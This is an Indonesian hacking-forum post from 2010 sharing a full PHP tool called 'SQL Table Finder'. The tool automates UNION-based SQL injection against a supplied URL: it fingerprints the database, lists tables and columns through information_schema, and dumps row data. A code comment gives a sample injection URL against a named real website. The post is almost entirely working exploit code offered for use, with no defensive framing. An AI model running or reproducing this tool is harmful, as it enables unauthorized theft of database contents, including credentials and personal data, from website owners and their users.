Sungguminasa Cyber Community
Would you like to react to this message? Create an account in a few clicks or log in to continue.

!




    BAGI PARA MEMBER/NON-MEMBER
    SILAHKAN DAFTAR ULANG DIWEBSITE SUNGGUMINASA CYBER COMMUNITY YANG BARU
    DI

    HTTP://MKZSCC.COM/


    MKZxRoel (Admin)

SQL Table Finder

Sungguminasa Cyber Community :: Software dan Hardware :: Komputer (PC) :: ۞Software :: ۞Web Development/Programming

Go down

SQL Table Finder Empty SQL Table Finder

Post  Dante Mon 29 Nov 2010 - 10:17

SQL Table Finder

SQL Table Finder, saved in php extension

Code:
<?php
set_time_limit(0);
error_reporting(0);
$url = $_POST['url'];
$tbl = $_POST['tbl'];
$col = $_POST['col'];
$by = "0x67626C61636B";
$spasi = "+";
$end = "--";
$action = $_POST['action'];
?>
<html>
<head>      
<title></title>
<style>
body{
   color: silver;
   background-color: #333;
   font-family: "Courier New";
   font-size: 11px;
}
input {
   color: silver;
   background-color: #333;
   font-family: "Courier New";
   font-size: 11px;
   border: silver 1px solid;
}
a{
   text-decoration:none;
   color: silver;
   font-family: "Courier New";
   font-size: 11px;
}
a:hover{
   text-decoration:underline;
   color: #00ff00;
   font-family: "Courier New";
   font-size: 11px;
}
</style>
</head>
<body>
<form method="POST" action="" name="gettbl">
   <input type="hidden" name="action" value="gettbl">
   <input type="text" name="url" id="url" size="90" value="<?php print $url; ?>">
   <input type="submit" value="Get Tables">
</form>
<form method="POST" action="" name="getcol">
   <input type="hidden" name="action" value="getcol">
   <input type="text" name="url" id="url" size="90" value="<?php print $url; ?>">
   <input type="text" name="tbl" id="tbl" size="20" value="">
   <input type="submit" value="Get Columns">
</form>
<form method="POST" action="" name="dump">
   <input type="hidden" name="action" value="dump">
   <input type="text" name="url" id="url" size="90" value="<?php print $url; ?>">
   <input type="text" name="tbl" id="tbl" size="20" value="<?php print $tbl; ?>"><br>
   <input type="text" name="col" id="col" size="90" value="">
   <input type="submit" value="Dump">
</form>
<?php
if($action == "gettbl") {
   if($url){
      print "<pre>[+] Gathering database configuration...\r\n\r\n-------------------------------------------------------\r\n";
      $getinfo = str_replace("gblack", "UNHEX(HEX(CONCAT(".$by.",CONCAT_WS(0x3a,user(),version(),database()),".$by.")))", $url);
      $getinfo.= $end;
      $info = FetchURL($getinfo);
      if (preg_match("/gblack(.*?)gblack/i", $info, $cocok))  {
         $det = preg_split("/:/", $cocok[1]);
         print "User\t: ".$det[0]."\r\n";
         print "Version\t: ".$det[1]."\r\n";
         print "Database: ".$det[2]."\r\n-------------------------------------------------------\r\n\r\n";
         flush();
      }
      $ver = explode(".", $det[1]);
      //print_r($ver);
      if($ver[0] == "5") {
         // http://www.coolercode.com/myspace_layouts/myspace_layout.php?cat_id=44+AND+1=0+UNION+SELECT+1,2,group_concat(table_name),4,5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--
         // http://www.coolercode.com/myspace_layouts/myspace_layout.php?cat_id=44+AND+1=0+UNION+SELECT+1,2,gblack,4,5,6,7,8,9,10,11--
         $counttable = str_replace("gblack", "UNHEX(HEX(CONCAT(".$by.",COUNT(table_name),".$by.")))", $url);
         $counttable.= $spasi."from".$spasi."information_schema.tables".$spasi."where".$spasi."table_schema=database()".$end;
         $tablecount = FetchURL($counttable);
         if (preg_match("/gblack(.*?)gblack/i", $tablecount, $cocok))  {
            $jumtable = $cocok[1];
            print "[+] There are ".$jumtable." tables in '".$det[2]."' database...\r\n\r\n-------------------------------------------------------\r\n";
            flush();
            
         }
         for($x=0;$x<=$jumtable;$x++) {
            $dumptable = str_replace("gblack", "UNHEX(HEX(CONCAT(".$by.",table_name,".$by.")))", $url);
            $dumptable.= $spasi."from".$spasi."information_schema.tables".$spasi."where".$spasi."table_schema=database()".$spasi."limit".$spasi.$x.",1".$end;
            $tabledump = FetchURL($dumptable);
            if (preg_match("/gblack(.*?)gblack/i", $tabledump, $cocok))  {
               print "<a id=".$cocok[1]." href="#" onClick="document.getcol.tbl.value='".$cocok[1]."'">".$cocok[1]."</a>\r\n";
               flush();
            }
            flush();
         }
      } else {
         print "Can't work on this version!\r\n";
      }
   }
   print "-------------------------------------------------------\r\n</pre>";
} elseif ($action == "getcol") {
   if($url){
      print "<pre>";
      $countcol = str_replace("gblack", "UNHEX(HEX(CONCAT(".$by.",COUNT(column_name),".$by.")))", $url);
      $countcol.= $spasi."from".$spasi."information_schema.columns".$spasi."where".$spasi."table_name=0x".bin2hex($tbl).$end;
      //print $countcol;
      $colcount = FetchURL($countcol);
      if (preg_match("/gblack(.*?)gblack/i", $colcount, $cocok))  {
         $jumcol = $cocok[1];
         print "[+] There are ".$jumcol." columns in '".$tbl."' table...\r\n\r\n-------------------------------------------------------\r\n";
         flush();
         
      }
      for($x=0;$x<=$jumcol;$x++) {
         $dumpcol = str_replace("gblack", "UNHEX(HEX(CONCAT(".$by.",column_name,".$by.")))", $url);
         $dumpcol.= $spasi."from".$spasi."information_schema.columns".$spasi."where".$spasi."table_name=0x".bin2hex($tbl).$spasi."limit".$spasi.$x.",1".$end;
         $coldump = FetchURL($dumpcol);
         if (preg_match("/gblack(.*?)gblack/i", $coldump, $cocok))  {
            print "<a id=".$cocok[1]." href="#" onClick="document.dump.col.value=dump.col.value+',".$cocok[1]."'">".$cocok[1]."</a>\r\n";
            flush();
         }
         flush();
      }
      
   } else {
      print "Error!";
   }
   print "-------------------------------------------------------\r\n</pre>";
} elseif ($action == "dump") {
   if($url){
      print "<pre>";
      $countdata = str_replace("gblack", "UNHEX(HEX(CONCAT(".$by.",COUNT(*),".$by.")))", $url);
      $countdata.= $spasi."from".$spasi.$tbl.$end;
      $datacount = FetchURL($countdata);
      if (preg_match("/gblack(.*?)gblack/i", $datacount, $cocok))  {
         $jumdata = $cocok[1];
         print "[+] There are ".$jumdata." rows to dump from '".$col."' column(s)...\r\n\r\n-------------------------------------------------------\r\n";
         flush();
         
      }
      for($x=0;$x<=$jumdata;$x++) {
         $dumpdata = str_replace("gblack", "UNHEX(HEX(CONCAT(".$by.",CONCAT_WS(0x3a,$col),".$by.")))", $url);
         $dumpdata.= $spasi."from".$spasi.$tbl.$spasi."limit".$spasi.$x.",1".$end;
         $datadump = FetchURL($dumpdata);
         //print $dumpdata;
         if (preg_match("/gblack(.*?)gblack/i", $datadump, $cocok))  {
            print "[".$x."] ".$cocok[1]."\r\n";
            flush();
         }
         flush();
      }
      
   } else {
      print "Error!";
   }
   print "-------------------------------------------------------\r\n</pre>";
}
function FetchURL($url) {
   $ch = curl_init();
   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/3.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)");
   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
   curl_setopt($ch, CURLOPT_HEADER, 1);
   curl_setopt($ch, CURLOPT_URL, $url);
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt($ch, CURLOPT_TIMEOUT, 30);
   $data = curl_exec($ch);
   if(!$data) {
      return false;
   }
   return $data;
}
?>
</body>
</html>

Tester in [You must be registered and logged in to see this link.]
Dante
Dante

Jumlah posting : 36
Join date : 24.11.10
Age : 31
Lokasi : Samarinda

Kembali Ke Atas Go down

Kembali Ke Atas

Sungguminasa Cyber Community :: Software dan Hardware :: Komputer (PC) :: ۞Software :: ۞Web Development/Programming

 
Permissions in this forum:
Anda tidak dapat menjawab topik